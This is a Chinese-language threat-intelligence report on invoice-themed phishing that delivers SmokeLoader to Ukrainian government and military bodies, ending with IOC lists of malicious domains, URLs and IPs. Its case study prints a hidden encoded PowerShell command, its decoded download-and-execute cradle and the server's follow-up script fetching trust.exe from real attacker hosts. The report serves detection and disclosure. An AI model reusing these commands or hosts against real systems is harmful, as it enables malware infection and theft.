概 述

自2022年2月24日俄烏戰(zhàn)爭(zhēng)爆發(fā)以來(lái)，雙方長(zhǎng)期陷入膠著狀態(tài)，從烏方的反擊到瓦格納軍事政變，戰(zhàn)爭(zhēng)有利形勢(shì)正逐步地傾向于烏方，尤其是近日俄羅斯私營(yíng)軍事集團(tuán)瓦格納反叛事件（目前瓦格納事件已平息），更體現(xiàn)了當(dāng)前形勢(shì)的變化莫測(cè)，由此引發(fā)了國(guó)際社會(huì)的廣泛關(guān)注。從俄方來(lái)看，除了做好轉(zhuǎn)攻為守的戰(zhàn)略切換外，還得防止內(nèi)部各方勢(shì)力的分裂，但在這樣一個(gè)復(fù)雜的形勢(shì)下，他們并沒(méi)有放棄網(wǎng)絡(luò)戰(zhàn)這樣的一個(gè)選項(xiàng)，反而結(jié)合當(dāng)時(shí)的形勢(shì)來(lái)制定一些合適攻擊策略。尤其是2023年4月下旬開(kāi)始，烏方已經(jīng)開(kāi)始了大反攻計(jì)劃，由此牽涉到更加頻繁的資源調(diào)度和物資結(jié)算，這給了俄方的黑客組織一些機(jī)會(huì)，我們也從4月末開(kāi)始觀察到一系列與財(cái)務(wù)結(jié)算相關(guān)攻擊比如“5月賬單”、“待支付賬單”、“對(duì)賬單和對(duì)賬清單”和“發(fā)貨清單”以及 “添加賬單”等為誘餌的郵件攻擊，攻擊目標(biāo)也包含烏克蘭國(guó)家安全局、軍事管理局、州政府等等。對(duì)于交戰(zhàn)雙方而言，能夠通過(guò)低成本的網(wǎng)絡(luò)戰(zhàn)來(lái)獲取實(shí)時(shí)的軍事和政治情報(bào)，是一項(xiàng)長(zhǎng)期且可持續(xù)的戰(zhàn)術(shù)策略。

【資料圖】

此外我們還觀察到一些與戰(zhàn)爭(zhēng)相關(guān)事件有著緊密關(guān)聯(lián)的攻擊，比如5月中旬俄羅斯向?yàn)蹩颂m西部赫梅利尼茨基州發(fā)動(dòng)大規(guī)模無(wú)人機(jī)攻擊造成了大量人員受傷后，5月29號(hào)左右就出現(xiàn)了偽裝成醫(yī)藥公司賬單的攻擊，攻擊的主要目標(biāo)為該州的國(guó)家安全局；同樣是5月中旬，烏克蘭切爾尼戈夫州遭到俄羅斯導(dǎo)彈打擊，5月29日左右就出現(xiàn)了偽裝成烏克蘭礦石加工和采礦設(shè)備修理廠(chǎng)的發(fā)票攻擊，攻擊的主要目標(biāo)是烏克蘭切爾尼戈夫州政府。可見(jiàn)，網(wǎng)絡(luò)攻擊某種程度上在和一些戰(zhàn)爭(zhēng)行動(dòng)打配合，而這種配合又會(huì)反過(guò)來(lái)給予攻擊方更加實(shí)時(shí)的情報(bào)。

關(guān)于俄烏局勢(shì)下的網(wǎng)絡(luò)戰(zhàn)，我們?cè)M(jìn)行過(guò)多次深入的分析和追蹤，發(fā)布了《針對(duì)烏克蘭邊防局和國(guó)防部攻擊活動(dòng)深度分析》、《【深度分析】烏克蘭戰(zhàn)爭(zhēng)背后的網(wǎng)絡(luò)攻擊和情報(bào)活動(dòng)》和《【網(wǎng)絡(luò)戰(zhàn)】烏克蘭戰(zhàn)爭(zhēng)下的最新網(wǎng)絡(luò)攻擊活動(dòng)綜合報(bào)告》等。對(duì)于戰(zhàn)爭(zhēng)沖突的雙方來(lái)說(shuō)，無(wú)論是悄無(wú)聲息的戰(zhàn)前準(zhǔn)備期還是變化莫測(cè)的交戰(zhàn)期，基于情報(bào)需求的網(wǎng)絡(luò)間諜活動(dòng)都是一種低成本且高收益的重要選項(xiàng)。本文將詳細(xì)闡述和分析我們近期觀察到的一些針對(duì)烏克蘭的網(wǎng)絡(luò)攻擊事件，通過(guò)這些攻擊事件，我們關(guān)聯(lián)出了一些黑客組織使用的基礎(chǔ)設(shè)施、誘餌文件以及竊密木馬等信息并做進(jìn)一步的分析。從攻擊的時(shí)間上來(lái)看，這批攻擊主要集中在2023年5月和6月前后，這兩個(gè)時(shí)間段都是俄烏戰(zhàn)爭(zhēng)的關(guān)鍵節(jié)點(diǎn)；從攻擊載荷來(lái)看，黑客主要以投遞SmokeLoader木馬為主，用于下發(fā)竊密組件獲取情報(bào)。SmokeLoader是一款用于維護(hù)攻擊持續(xù)的守護(hù)型木馬，其采用多層shellcode進(jìn)行加密偽裝以繞過(guò)安全軟件的安全檢測(cè)。該木馬曾經(jīng)被多次使用于針對(duì)烏克蘭的網(wǎng)絡(luò)竊密活動(dòng)中，我們?cè)?021年針對(duì)烏克蘭邊防局和國(guó)防部攻擊活動(dòng)中發(fā)現(xiàn)了利用該木馬的攻擊，這背后可能是同一個(gè)組織所為，他們擁有非常豐富的攻擊武器包括Saint Bot、Raccoon、AutoIT木馬等，SaintBot木馬在2021年也被用于對(duì)格魯吉亞的攻擊中。

2 攻擊事件分析

從4月份烏克蘭計(jì)劃開(kāi)始反攻以來(lái)，在殘酷戰(zhàn)爭(zhēng)的背后，基于網(wǎng)絡(luò)攻擊的情報(bào)活動(dòng)也沒(méi)有停歇。我們?cè)?月到6月前后，觀測(cè)到了一系列針對(duì)烏克蘭的網(wǎng)絡(luò)攻擊事件。在我們觀測(cè)到的這些網(wǎng)絡(luò)攻擊中，黑客組織偽裝成烏克蘭制藥公司、醫(yī)療物資和設(shè)備的庫(kù)存和分配監(jiān)督機(jī)構(gòu)、國(guó)際運(yùn)輸公司、礦石加工和采礦設(shè)備修理廠(chǎng)等實(shí)體向?yàn)蹩颂m軍事管理局、安全局、切爾尼戈夫州政府等機(jī)構(gòu)發(fā)起了郵件攻擊。這大概是因?yàn)?，在烏克蘭的反攻戰(zhàn)斗中，伴隨著戰(zhàn)爭(zhēng)推進(jìn)和人員傷亡，烏克蘭軍方和政府需要對(duì)藥品、醫(yī)療物資、作戰(zhàn)軍用設(shè)備等戰(zhàn)略資源進(jìn)行頻繁的采購(gòu)和調(diào)度，這其中必然會(huì)和制藥公司、運(yùn)輸公司、設(shè)備修理廠(chǎng)等供應(yīng)商打交道，進(jìn)而產(chǎn)生一些訂單和賬單的往來(lái)。該黑客組織正是利用這個(gè)大背景，冒充這些供應(yīng)商向?yàn)蹩颂m的軍事和政府等機(jī)構(gòu)進(jìn)行社會(huì)工程學(xué)攻擊，一旦對(duì)方由于戰(zhàn)事緊迫，忙于物資調(diào)度和結(jié)算而疏于防范或放松警惕，錯(cuò)誤地相信了釣魚(yú)郵件的內(nèi)容，攻擊者就很可能成功向目標(biāo)設(shè)備植入SmokeLoader木馬，進(jìn)而竊取到烏方的作戰(zhàn)計(jì)劃、物資調(diào)度計(jì)劃等高等機(jī)密信息，而使自己一方在戰(zhàn)爭(zhēng)中贏得先機(jī)或取得進(jìn)攻或防御的主動(dòng)權(quán)。我們下面列舉幾個(gè)攻擊事件對(duì)該黑客組織的釣魚(yú)攻擊進(jìn)行詳細(xì)說(shuō)明。

圖1是一封發(fā)送自5月5日的釣魚(yú)郵件：發(fā)件人偽裝成了烏克蘭國(guó)際運(yùn)輸公司“ATL”，收件人是烏克蘭切爾諾夫策州軍事管理局的工作人員，郵件主題為“Додаю рахунок”，中文意思是“添加賬單”，郵件附件為“pax_2023_AB1058.zip”，解壓后為名稱(chēng)為“pax_2023_AB1058..js”的JavaScript腳本文件，其執(zhí)行后會(huì)從惡意服務(wù)器地址“http://homospoison.ru/one/portable.exe”下載名稱(chēng)為portable.exe 的SmokeLoader木馬，然后利用該木馬對(duì)攻擊目標(biāo)實(shí)施進(jìn)一步的攻擊行動(dòng)。

圖1 針對(duì)烏克蘭切爾諾夫策州軍事管理局的攻擊郵件

圖2是一封發(fā)送自5月29日的釣魚(yú)郵件，攻擊者偽裝成烏克蘭制藥公司“Промарма”的工作人員向?yàn)蹩颂m國(guó)家安全局赫梅利尼茨基州分局和伊萬(wàn)諾-弗蘭科夫斯克州分局的工作人員發(fā)起了郵件攻擊。郵件主題為“рахунок за травень”，中文意思是“5月賬單”。郵件正文包括 “З повагою”和“Лариса Лям?на ;0442008009”，“З повагою”是烏克蘭語(yǔ)，意為“敬禮”。通常用在正式的商務(wù)信函或公函中，這個(gè)短語(yǔ)通常用作信件的結(jié)尾禮貌用語(yǔ)。而“Лариса Лям?на ;0442008009”分別為聯(lián)系人名和聯(lián)系電話(huà)。郵件附帶有兩個(gè)附件，分別為名為“акт_зв?рки_рахунки.zip”（對(duì)賬單賬戶(hù)）的壓縮文件和名為“акт_зв?рки_та_рахунки.html”（對(duì)賬單和賬戶(hù)）的html文件。壓縮文件解壓后，我們發(fā)現(xiàn)其和惡意html文件” акт_зв?рки_та_рахунки.html”的hash值相同。該html文件被打開(kāi)后，會(huì)釋放名稱(chēng)為“акт_зв?рки_в?д_05_2023р.js”、“рахунок_№415_2023.js”和“рахунок_№416_2023.js”的惡意JavaScript腳本文件。經(jīng)分析，我們發(fā)現(xiàn)這三個(gè)腳本文件只是名稱(chēng)不同，它們的hash和內(nèi)容完全相同。其執(zhí)行后會(huì)從惡意服務(wù)器地址“http://premiumjeck.site/one/renew.exe”下載名稱(chēng)為renew.exe 的SmokeLoader木馬，然后利用該木馬對(duì)攻擊目標(biāo)實(shí)施進(jìn)一步的攻擊行動(dòng)。

圖2 針對(duì)烏克蘭安全局的攻擊郵件

我們還觀測(cè)到在5月29日前后，該黑客組織除了攻擊烏克蘭國(guó)家安全局，其同時(shí)又對(duì)烏克蘭的多個(gè)軍事和政府等敏感機(jī)構(gòu)發(fā)起了網(wǎng)絡(luò)攻擊。圖3是部分相關(guān)攻擊使用的網(wǎng)絡(luò)攻擊郵件截圖。

圖3 關(guān)聯(lián)到的部分攻擊郵件

我們將該黑客組織這段時(shí)間使用的部分定向攻擊郵件的相關(guān)信息列到表1。結(jié)合前面的攻擊事件和表1，我們可以看到，黑客構(gòu)造了相似的郵件向目標(biāo)實(shí)施網(wǎng)絡(luò)攻擊。該黑客組織除了將發(fā)件人偽裝成烏克蘭國(guó)際運(yùn)輸公司、烏克蘭制藥公司向?yàn)蹩颂m切爾諾夫策州軍事管理局、烏克蘭國(guó)家安全局發(fā)起攻擊外，其還將發(fā)件人偽裝成烏克蘭醫(yī)療物資和設(shè)備的庫(kù)存和分配監(jiān)督機(jī)構(gòu)、礦石加工和采礦設(shè)備修理廠(chǎng)等實(shí)體的工作人員向更多的目標(biāo)實(shí)施網(wǎng)絡(luò)攻擊。其使用了 “對(duì)賬單和對(duì)賬清單”、“發(fā)票”和“待付賬單”等內(nèi)容作為郵件主題來(lái)誘使目標(biāo)相信郵件內(nèi)容。一旦受害者相信郵件內(nèi)容并執(zhí)行了郵件附件中的惡意程序，惡意SmokeLoader木馬就被植入到了受害者的計(jì)算機(jī)上。

表1部分定向攻擊郵件相關(guān)信息

從攻擊郵件的收件人我們可以看出，這些網(wǎng)絡(luò)攻擊是針對(duì)烏克蘭國(guó)家安全局機(jī)構(gòu)人員、烏克蘭沃倫州地方議會(huì)機(jī)構(gòu)人員、烏克蘭切爾尼戈夫州政府人員以及烏克蘭切爾諾夫策州軍事管理局機(jī)構(gòu)人員發(fā)起的。部分相關(guān)受害部門(mén)相關(guān)信息見(jiàn)圖4、圖5、圖6和圖7。

圖4 目標(biāo)為烏克蘭國(guó)家安全局相關(guān)信息

圖5 目標(biāo)為烏克蘭沃倫州地方議會(huì)相關(guān)信息

圖6 目標(biāo)為烏克蘭切爾尼戈夫州政府相關(guān)信息

圖7 目標(biāo)為烏克蘭切爾諾夫策州軍事管理局相關(guān)信息

3 黑客攻擊分析

3.1 基礎(chǔ)設(shè)施

我們將檢測(cè)到的這些魚(yú)叉郵件的惡意附件和其投放的惡意文件信息整理到表2，從表2中我們可以看到，這些惡意文件類(lèi)型包含html、JavaScript、vhd、 exe和zip壓縮包文件以及rar壓縮包文件。它們?cè)赩irusTotal上的首次上傳時(shí)間最早為5月4日，最新為5月30日。

表2 攻擊郵件附件和后續(xù)投放的惡意文件列表

我們對(duì)這些惡意文件分析后，發(fā)現(xiàn)在這些網(wǎng)絡(luò)攻擊中，該黑客組織使用的惡意服務(wù)器IP地址為“176.124.193.111”，該服務(wù)器用于惡意代碼和惡意程序的分發(fā)。并且攻擊者同時(shí)申請(qǐng)了多個(gè)惡意域名（見(jiàn)表3）和該服務(wù)器綁定。

表3 惡意服務(wù)綁定的惡意域名

我們?cè)僖詯阂夥?wù)器地址“176.124.193.111”綁定的以上域名和攻擊者用于投放惡意SmokeLoader木馬的服務(wù)器所綁定的域名“homospoison.ru”為線(xiàn)索進(jìn)行關(guān)聯(lián)分析，我們發(fā)現(xiàn)了該黑客組織所使用的更多的惡意文件（見(jiàn)表4）和惡意域名（見(jiàn)表5）。這些惡意文件有的是作為郵件附件發(fā)送給攻擊目標(biāo)，有的是最終投放的惡意SmokeLoader木馬。文件在VirusTotal的首次上傳時(shí)間最早為2023年5月4日，最新為2023年6月4日。結(jié)合我們最初檢測(cè)到的那幾次網(wǎng)絡(luò)攻擊，可以看出此次針對(duì)烏克蘭軍事和政府等機(jī)構(gòu)的攻擊分別發(fā)生在5月初前后和6月初前后。

表4 關(guān)聯(lián)到的其他惡意文件

表5 關(guān)聯(lián)到的其他惡意域名

我們?cè)賹?duì)該黑客組織使用的14個(gè)惡意域名分析后發(fā)現(xiàn)，除了有4個(gè)域名注冊(cè)自烏克蘭域名服務(wù)商“UKRNAMES”，其余均注冊(cè)自位于俄羅斯的域名服務(wù)商。它們分別是“REGRU-RU”、“REG.RU, LLC”、“RU-CENTER-RU”和“REGTIME-RU”。這些域名綁定的IP地址除了“195.123.219.57”屬于荷蘭主機(jī)服務(wù)商“Green Floid LLC”外，其余均屬于位于俄羅斯莫斯科的主機(jī)服務(wù)商“Dolgova Alena Andreevna”、“ IQHost Ltd”和“ Cloud Assets LLC”（見(jiàn)表6）。從表6中我們還可以看到，這14個(gè)惡意域名的注冊(cè)時(shí)間最早是4月28日，最新為5月30日，這些域名的創(chuàng)建時(shí)間也和此次攻擊時(shí)間相吻合。

表6 惡意域名注冊(cè)信息

3.2 攻擊目標(biāo)

從攻擊目標(biāo)上看，該黑客組織主要攻擊烏克蘭安全局、烏克蘭沃倫州議會(huì)、烏克蘭切爾尼戈夫州政府和烏克蘭切爾諾夫策州軍事管理局等機(jī)構(gòu)（見(jiàn)圖8）。攻擊者主要通過(guò)向這些機(jī)構(gòu)的工作人員發(fā)送帶有惡意附件的攻擊郵件，向攻擊目標(biāo)投放SmokeLoader木馬。而從攻擊目標(biāo)所處的地理位置來(lái)看，只有切爾尼戈夫州（烏克蘭北部）處于俄烏戰(zhàn)爭(zhēng)的交戰(zhàn)區(qū)域內(nèi)，其它州包括赫梅利尼茨基州（烏克蘭西部）、伊萬(wàn)諾-弗蘭科夫斯克州（烏克蘭西部）、切爾諾夫策州（烏克蘭西部）和沃倫州（烏克蘭西北部）等均位于遠(yuǎn)離戰(zhàn)場(chǎng)的區(qū)域。表面上看似乎與俄烏的一線(xiàn)戰(zhàn)場(chǎng)關(guān)聯(lián)度不高，但從網(wǎng)絡(luò)戰(zhàn)的角度思考，這可能是攻擊者避重就輕的一種迂回攻擊的思路。通常情況下軍事、國(guó)安、政府等核心部門(mén)依靠電報(bào)系統(tǒng)完成情報(bào)信息的上傳下達(dá)，這些系統(tǒng)的核心資源網(wǎng)絡(luò)都會(huì)實(shí)施物理隔離、電磁屏蔽等安全防護(hù)手段，尤其在戰(zhàn)爭(zhēng)狀態(tài)下，一線(xiàn)戰(zhàn)場(chǎng)的涉密人員處于高度警惕和防備的狀態(tài)，常見(jiàn)的網(wǎng)絡(luò)攻擊手段是極難成功的。而在戰(zhàn)場(chǎng)的大后方，不論是防護(hù)措施還是人員的思想意識(shí)都相對(duì)薄弱。因此，攻擊者選擇針對(duì)遠(yuǎn)離戰(zhàn)場(chǎng)的核心機(jī)構(gòu)目標(biāo)展開(kāi)網(wǎng)絡(luò)攻擊成功率無(wú)疑會(huì)大增。一方面同樣能夠竊取到所需的情報(bào)，另一方面還可以作為前期偵察的據(jù)點(diǎn)開(kāi)展橫移滲透、網(wǎng)絡(luò)破壞等更深入的攻擊活動(dòng)。

圖8 攻擊目標(biāo)

3.3 組織歸屬

從攻擊目標(biāo)上看，該黑客組織目前的攻擊活動(dòng)帶有明顯的軍事意圖，該定向攻擊是針對(duì)烏克蘭軍事、議會(huì)和政府部門(mén)等敏感機(jī)構(gòu)發(fā)起的。此外，根據(jù)我們的基礎(chǔ)設(shè)施分析，黑客使用的惡意域名和惡意服務(wù)器絕大多來(lái)自俄羅斯，再加上該黑客組織用于網(wǎng)絡(luò)攻擊活動(dòng)的惡意服務(wù)器上只有SmokeLoader這一種惡意程序（SmokeLoader最早于2011年在俄語(yǔ)黑客論壇上由名為SmokeLdr的成員出售，并且從2014年3月之后，該木馬僅出售給講俄語(yǔ)的黑客）。因此，不管從該組織的攻擊目標(biāo)、其所使用的木馬還是其使用的惡意域名和惡意服務(wù)器等基礎(chǔ)設(shè)施來(lái)看，該黑客組織都很符合俄羅斯黑客組織的習(xí)慣。再結(jié)合俄烏戰(zhàn)爭(zhēng)的大背景，尤其是6月份前后，俄烏雙方在戰(zhàn)場(chǎng)上的新動(dòng)向，我們認(rèn)為此次攻擊活動(dòng)是由俄羅斯黑客組織發(fā)起的。我們會(huì)持續(xù)關(guān)注該黑客組織的相關(guān)基礎(chǔ)設(shè)施變化以對(duì)其動(dòng)向進(jìn)行持續(xù)追蹤。

4 攻擊案例分析

我們來(lái)看該黑客組織其中的一次攻擊活動(dòng)。如圖9所示，在此次攻擊中，攻擊者先在自己的惡意服務(wù)器“176.124.193.111”上配置和部署好惡意VBS代碼和SmokeLoader木馬，然后向?yàn)蹩颂m沃倫州議會(huì)的工作人員投遞帶有惡意附件“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”的魚(yú)叉郵件，“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”文件解壓后是名稱(chēng)為“AKT_28_05_2023p._pax_28_05_2023p.vbs”的惡意腳本文件。其執(zhí)行后會(huì)使用PowerShell從惡意服務(wù)器地址“http://176.124.193.111”請(qǐng)求事先部署在其上的惡意VBS代碼執(zhí)行，這段惡意VBS代碼會(huì)從惡意服務(wù)器地址“http://176.124.193.111/antirecord/trust.exe”下載SmokeLoader木馬到受害者的設(shè)備執(zhí)行。通過(guò)上述過(guò)程，攻擊者最終成功向攻擊目標(biāo)投放了SmokeLoader木馬。

圖9 攻擊流程圖

此次攻擊中，攻擊者使用了惡意域名americanocoffea.ru”和“jskgdhjkdfhjdkjhd844.ru”，它們均解析到IP地址為“176.124.193.111”的惡意服務(wù)器。該惡意服務(wù)器配置了惡意VBS代碼，用于動(dòng)態(tài)返回黑客下一階段攻擊的惡意程序的下載地址（見(jiàn)圖10）。

圖10 惡意域名綁定的惡意服務(wù)器信息

4.1 誘餌郵件投遞

此次攻擊始于一封將來(lái)源偽裝成烏克蘭基輔電子政務(wù)相關(guān)工作人員的攻擊郵件（見(jiàn)圖11），此郵件是發(fā)送給烏克蘭沃倫州議會(huì)的工作人員。整個(gè)郵件看起來(lái)像是一個(gè)付款通知賬單郵件：郵件以“Рахунок до оплати（待付賬單）”為標(biāo)題，“Рахунок (без ПДВ) № 28 в?д 28.05.2023（無(wú)增值稅發(fā)票號(hào)碼28，發(fā)票日期為2023年5月28日）”為誘餌文檔名稱(chēng)，正文是 “З повагою,Владана Данишевич +380980143363 гол. бух”，翻譯過(guò)來(lái)為“敬禮，Владана Данишевич（人名），+380980143363（電話(huà)），首席會(huì)計(jì)師”，正文這樣寫(xiě)是為了增加這份郵件的可信度。

圖11 攻擊者投放的攻擊郵件

附件“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”解壓后是名稱(chēng)為" AKT_28_05_2023p._pax_28_05_2023p.vbs"的惡意腳本文件。該腳本將大量?jī)?nèi)容編碼為整數(shù)數(shù)組，并且還對(duì)其余內(nèi)容進(jìn)行了嚴(yán)重的隨機(jī)化字符串混淆處理。如圖12所示，我們對(duì)該惡意腳本進(jìn)行動(dòng)態(tài)調(diào)試。惡意腳本首先使用lbound（）、mid（）、asc（）、chr（）等運(yùn)算函數(shù)將被編碼為整數(shù)的內(nèi)容解密計(jì)算后賦值給名稱(chēng)為“CzVSrYTOisCktDpoRvcYijGYVaUu”的字符串變量，然后將“字符串變量CzVSrYTOisCktDpoRvcYijGYVaUu”作為參數(shù)傳到“vvKfrwrFOsLdtXrsBjHbpTP”函數(shù)，最后調(diào)用“execute”函數(shù)執(zhí)行解密后的惡意代碼。

圖12 調(diào)試加密的js腳本

我們跟蹤“execute”函數(shù)，到達(dá)了該惡意代碼解密后執(zhí)行的明文代碼處（見(jiàn)圖13）。去除垃圾字符后，該惡意腳本最終執(zhí)行的代碼為“C:\\\\Windows\\\\System32\\\\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==。該段惡意代碼執(zhí)行的內(nèi)容Base64解碼后為：IEX (New-Object Net.Webclient).downloadstring("http://americanocoffea.ru")，即其會(huì)從遠(yuǎn)程服務(wù)器“americanocoffea.ru”獲取遠(yuǎn)程惡意代碼后繼續(xù)執(zhí)行。

圖13 解密出惡意代碼

4.2 遠(yuǎn)程代碼執(zhí)行

我們?cè)L問(wèn)地址“http://americanocoffea.ru”，發(fā)現(xiàn)其返回的惡意代碼為“$path = $Env:temp+"\\\\wOvgI.exe"; $client = New-Object System.Net.WebClient; $client.downloadfile("http://americanocoffea.ru/antirecord/trust.exe",$path); Start-Process -FilePath $path“，如圖14所示。該惡意代碼會(huì)從遠(yuǎn)程服務(wù)器地址”http://americanocoffea.ru/antirecord/trust.exe“下載惡意程序“trust.exe”去執(zhí)行。圖15為遠(yuǎn)程服務(wù)器地址“http://americanocoffea.ru/antirecord”托管惡意程序“trust.exe”的詳細(xì)信息?？梢钥吹皆搻阂獬绦蜃詈蟮男薷臅r(shí)間為2023年5月30日08時(shí)42分，文件大小為274K。

圖14 惡意服務(wù)器返回的惡意代碼

圖15 惡意服務(wù)托管的惡意程序

4.3 SmokeLoader執(zhí)行

下載執(zhí)行的“trust.exe”惡意文件為SmokeLoader木馬，SmokeLoader是一種加載器，其主要功能是下載和安裝其他惡意軟件（例如勒索軟件、銀行木馬等）到受害者的系統(tǒng)。該木馬最早于2011年在俄語(yǔ)黑客論壇上由名為SmokeLdr的成員出售，并且從2014年3月之后，該木馬僅出售給講俄語(yǔ)的黑客。SmokeLoader的傳播方式通常是通過(guò)垃圾郵件、惡意鏈接、漏洞利用等方式進(jìn)行。由于Smoke Loader木馬的靈活性和不斷發(fā)展的能力，它已經(jīng)成為了黑客和犯罪團(tuán)伙中廣泛使用的一種惡意軟件。

該SmokeLoader木馬執(zhí)行后，會(huì)使用HeapAlloc函數(shù)在其進(jìn)程堆空間上申請(qǐng)內(nèi)存并修改內(nèi)存屬性為rwe，接著將存儲(chǔ)在木馬數(shù)據(jù)段的惡意代碼通過(guò)一系列移位和xor計(jì)算進(jìn)行解密，再將解密后的shellcode拷貝到申請(qǐng)的堆空間，最后跳轉(zhuǎn)到堆上的shellcode執(zhí)行，圖16是跳轉(zhuǎn)到shellcode執(zhí)行處的代碼。

圖16 跳轉(zhuǎn)到shellcode處執(zhí)行

Shellcode執(zhí)行后，會(huì)使用VirtualAlloc函數(shù)申請(qǐng)內(nèi)存空間，然后解密第二段shellcode并拷貝到申請(qǐng)的內(nèi)存空間，接著再跳轉(zhuǎn)執(zhí)行第二個(gè)shellcode，圖17是跳轉(zhuǎn)到第二個(gè)shellcode執(zhí)行處的代碼。

圖17 跳轉(zhuǎn)到第二個(gè)shellcode處執(zhí)行

第二個(gè)shellcode使用進(jìn)程挖空技術(shù)將解密后的第三段shellcode填充到SmokeLoader木馬的“.text”段地址空間去執(zhí)行，圖18是跳轉(zhuǎn)到第三個(gè)shellcode執(zhí)行處的代碼。

圖18 跳轉(zhuǎn)到第三個(gè)shellcode處執(zhí)行

第三個(gè)shellcode執(zhí)行SmokeLoader核心代碼，SmokeLoader核心代碼執(zhí)行后會(huì)從遠(yuǎn)程服務(wù)器地址“http://jskgdhjkdfhjdkjhd844.ru/”獲取惡意命令“$path = $Env:temp+"\\\\YokusmD.exe"; $client = New-Object System.Net.WebClient; $client.downloadfile("http://americanocoffea.ru/antirecord/trust.exe",$path); Start-Process -FilePath $path”（如圖19所示），然后從“http://americanocoffea.ru/antirecord/trust.exe”地址處下載下一階段的惡意程序執(zhí)行。

圖19 惡意服務(wù)器返回的惡意代碼

不過(guò)截止目前，下載執(zhí)行的用于下一階段攻擊的“http://americanocoffea.ru/antirecord/trust.exe”是我們分析的SmokeLoader木馬自身。惡意服務(wù)器的這種配置實(shí)際上是一個(gè)惡意代碼的輪詢(xún)策略。在發(fā)動(dòng)有效攻擊前，SmokeLoader木馬通過(guò)下載自身進(jìn)行輪詢(xún)，一旦準(zhǔn)備向目標(biāo)發(fā)起攻擊，黑客便會(huì)在其惡意服務(wù)器上重新配置更復(fù)雜或更高級(jí)的攻擊武器，以實(shí)現(xiàn)其特定的攻擊目的。

5 總 結(jié)

在俄烏戰(zhàn)爭(zhēng)中，隨著戰(zhàn)事的推進(jìn)和烏方的反攻，戰(zhàn)爭(zhēng)形勢(shì)似乎在朝著對(duì)俄羅斯不利的方向進(jìn)展。俄方黑客組織基于前線(xiàn)的進(jìn)攻和防御需要對(duì)烏方進(jìn)行網(wǎng)絡(luò)攻擊也都是老操作了。我們對(duì)俄烏網(wǎng)絡(luò)戰(zhàn)下來(lái)自俄羅斯的黑客組織的最新攻擊活動(dòng)進(jìn)行了分析，通過(guò)以上分析我們可以看到，該黑客組織此次對(duì)烏克蘭的軍事、議會(huì)和政府等敏感機(jī)構(gòu)進(jìn)行網(wǎng)絡(luò)攻擊很可能是為了竊取烏方的作戰(zhàn)情報(bào)信息，以輔助俄方在前線(xiàn)戰(zhàn)場(chǎng)上進(jìn)行攻擊或防御決策。我們對(duì)此次攻擊中俄方黑客組織使用的基礎(chǔ)設(shè)施、攻擊目標(biāo)等方面進(jìn)行了全面的分析，并對(duì)最近出現(xiàn)的一次攻擊活動(dòng)進(jìn)行了詳細(xì)的分析。從我們分析的結(jié)果來(lái)看，俄方黑客組織使用的大量惡意域名和用于托管惡意文件的虛擬主機(jī)等網(wǎng)絡(luò)基礎(chǔ)設(shè)施大部分來(lái)源于俄羅斯。這說(shuō)明，在針對(duì)烏方的網(wǎng)絡(luò)攻擊中，隨著戰(zhàn)事的不斷推進(jìn)，俄方黑客已經(jīng)不屑于再遮遮掩掩，他們索性選擇直來(lái)直去、簡(jiǎn)單粗暴地實(shí)施攻擊。不過(guò)如果我們從另外一個(gè)角度來(lái)看，俄方使用自己的域名和服務(wù)器或許也是不得已而為之的妥協(xié)方案，畢竟基礎(chǔ)設(shè)施在俄羅斯之外，攻擊成果很容易被烏方和其盟友直接“截胡”，到頭來(lái)白忙一場(chǎng)。我們會(huì)持續(xù)關(guān)注俄烏戰(zhàn)爭(zhēng)和俄烏網(wǎng)絡(luò)戰(zhàn)下該黑客組織的相關(guān)基礎(chǔ)設(shè)施變化以對(duì)該組織的動(dòng)向進(jìn)行持續(xù)追蹤。

6IOC

6.1 域名

internetcygane.ru

hopentools.site

americanocoffea.ru

jskgdhjkdfhjdkjhd844.ru

premiumjeck.site

polinamailserverip.ru

lamazone.site

freesitucionap.com

azartnyjboy.com

maximprofile.net

alegoomaster.com

infomalilopera.ru

homospoison.ru

coudzoom.ru

6.2 URL

http://americanocoffea.ru/

http://polinamailserverip.ru/

http://jskgdhjkdfhjdkjhd844.ru/antirecord/trust.exe

http://maximprofile.net/

http://infomalilopera.ru/

http://jskgdhjkdfhjdkjhd844.ru/

http://azartnyjboy.com/

http://hopentools.site/

http://alegoomaster.com/

http://freesitucionap.com/

6.3 IP

176.124.193.111

195.123.219.57

193.106.175.177

77.232.37.148

參考鏈接：

[1] https://cert.gov.ua/article/4555802

[2] https://cert.gov.ua/article/4755642

關(guān)鍵詞：